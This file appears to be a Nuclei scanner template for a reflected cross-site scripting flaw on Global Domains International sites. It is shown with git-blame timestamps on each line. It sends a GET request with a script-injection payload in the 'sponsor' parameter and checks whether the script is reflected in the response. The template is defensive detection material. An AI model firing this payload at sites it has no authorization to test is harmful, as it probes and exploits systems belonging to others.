2021-12-18 09:21:08 +00:00
|
|
|
id: global-domains-xss
|
|
|
|
|
|
|
|
info:
|
2022-09-10 01:55:52 +00:00
|
|
|
name: Global Domains International - Cross-Site Scripting
|
2021-12-18 09:21:08 +00:00
|
|
|
author: princechaddha
|
2022-09-10 01:55:52 +00:00
|
|
|
severity: high
|
|
|
|
description: |
|
|
|
|
Sites hosted by Global Domains International, Inc. have cross-site scripting and directory traversal vulnerabilities.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://cxsecurity.com/issue/WLB-2018020247
|
2022-09-10 01:55:52 +00:00
|
|
|
- https://packetstormsecurity.com/files/126545/Global-Domains-International-Cross-Site-Scripting-Traversal.html
|
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 7.2
|
|
|
|
cwe-id: CWE-79
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-10-14 11:27:55 +00:00
|
|
|
tags: globaldomains,xss,packetstorm
|
2021-12-18 09:21:08 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-12-18 09:21:08 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-10-20 11:41:13 +00:00
|
|
|
|
|
|
|
# digest: 490a00463044022013ac4203bc7c6203e95417cb912d11cf2cf1d8ed31f394bcfdfe45ce2f1b5ffa0220653bf907679b4b39de8e4117b26606d1cc7bc11084f7bd33c7a42a07aefc0e54:922c64590222798bb761d5b6d8e72950
|